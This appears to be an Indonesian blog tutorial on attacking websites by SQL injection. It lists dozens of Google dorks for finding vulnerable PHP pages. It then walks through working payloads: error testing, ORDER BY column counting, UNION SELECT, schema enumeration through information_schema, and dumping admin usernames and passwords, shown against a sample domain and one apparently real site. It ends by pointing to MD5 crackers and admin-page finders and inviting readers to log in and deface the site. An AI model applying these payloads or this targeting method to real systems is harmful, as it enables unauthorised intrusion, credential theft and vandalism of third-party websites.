Mencari target,
untuk mencari target kalian dapat memakai google dorks sebagai berikut :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:ptray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:ppinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:pinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
contoh : http://www.target.co.th/en/newsroom/news_detail.php?id=193
===[2]===
Setelah menemukan target , langkah berikutnya adalah mengecek apakah target dapat di inject atau tidak.
cara mengecek dengan menambahkan karakter ' atau - sebelum angka.
contoh :
http://www.target.co.th/en/newsroom/news_detail.php?id=193'
http://www.target.co.th/en/newsroom/news_detail.php?id=-193
jika ditemukan pesan error seperti :
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY AddDate DESC' at line 1 Atau tampilan halaman page berubah dari tampilan sebelumnya, Maka target tersebut vuln / dapat di inject.
===[3]===
gunakan perintah : +order+by+angka--
contoh:
http://www.target.co.th/en/newsroom/news_detail.php?id=193+order+by+1--
http://www.target.co.th/en/newsroom/news_detail.php?id=193+order+by+2--
http://www.target.co.th/en/newsroom/news_detail.php?id=193+order+by+3--
http://www.target.co.th/en/newsroom/news_detail.php?id=193+order+by+dan_seterusnya--
http://www.target.co.th/en/newsroom/news_detail.php?id=193+order+by+14--
http://www.target.co.th/en/newsroom/news_detail.php?id=193+order+by+15--
ketika menginject sampai angka ini muncul pesan error/berubah tampilan maka jumlah tabel berarti hanya berjumlah 14
===[4]===
Karena tadi error sampai angka 15
Gunakan perintah : +and+1=2+union+select+angka_sampai_jumlah_tabel--
Maka:
http://www.target.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Maka akan muncul angka misalnya angka 3 ,5 (angka kadang muncul lebih dari 2) version() ---> untuk menampilkan versi database
Masukan perintah tsb pada angka yg keluar tadi
contoh:
http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--
Nah disini akan muncul versi nya jika versi 5 maka anda beruntung tapi jika table nya versi 4 tinggalkan saja soalnya kita perlu menebak nama tablenya, ada ratusan cape dech....
contoh nya :
5.0.51b-community......bla..bla
4.0.51b-community.....bla..bla
===[5]===
Untuk versi 4
lewati saja coz Ribet untuk mencari atau meraba table’y,hehe….
Untuk versi 5
Untuk menampilkan semua isi dari table tersebut adalah
Perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi dan
Perintah +from+information_schema.tables+where+table_schema=database()-- --> dimasukan setelah angka terakhir
Contoh:
http://www.target.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()--
maka muncul :
_career_app_form,admin,admin_log,admin_tb,annual_meeting,annual_meeting_category,annual_report,annual_report_category,article_special,article_special_category,board_gallery,board_gallery_bak_23-9-2008,board_gallery_category,board_gallery_category_bak_23-9-2008,car_insurance_reg,car_loan_reg,car_loan_reg_category,career_app_form,career_back
Cari table dengan nama seperti atau mendekati nama2 seperti ini pada tabel yg muncul seperti diatas user, usr, username, user_name, login, user_admin, name, admin_user, dll.
di dalam tersebut biasanya tersimpan username dan password.
dalam contoh ini adalah admin ubah dulu kata users ke dalam hexa memakai ascii converter, kalo gwa pake web ini : Texttohex
"admin" di convert hasilnya adalah 0x61646D696E
===[6]===
Mencari isi table
Perintah : group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah : +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir
ganti hexa dengan kata users yg sudah di convert ke hexa
contoh :
http://www.target.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x61646D696E--
Maka isi dari table admin adalah
AdminID,Username,Password,Fname,Lname,AdminType,AddDate,Active,UpdateDate
===[7]===
Melihat isi dari Username,Password.
gunakan perintah : group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi perintah +from+nama table berasal -> dimasukan setelah angka terakhir
contoh : http://www.target.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(Username,0x3a,Password),4,5,6,7,8,9,10,11,12,13,14+from+admin0x3a diantara username dan password adalah tanda : (titik dua ) maka akan muncul data2nya
misalnya : admin:password,userlain:passwordlain
jika passwordnya berupa hash md5 seperti "ab1984e073f70207fbf95400d52a8c04" hasil cracknya : 5422907
banyak web online yang menyediakan crack md5, kalo gwa sering pake web yg ini : MD5Decrypter
===[8]===
Langkah terakhir adalah mencari halaman login admin, bisa ofline memakai tools atau ofline lewat website penyedia adminfinder.
Untuk ofline download tools’y (puny om Sudden_death) :D disni :
Admin Finder Offline
untuk online bisa memakai web ini:
Admin Finder Online
masukkan url target http://www.target.com trus scan deeeh…
klo udh ketemu coba masuk dengan user & password yang tadi kita dapatkan hasil injection!!!
Beres...deh klo dah gtu terserah kalian-kalian smua mo ngapain jg, mo deface kek silahkan!
tpi ingat kata om Se'to jg jadilah hacker yg baik! :D
jangan menghapus/ mengrusak, cukup me-riname index.php nya trus masukan index.php kamu!
Tidak ada komentar:
Posting Komentar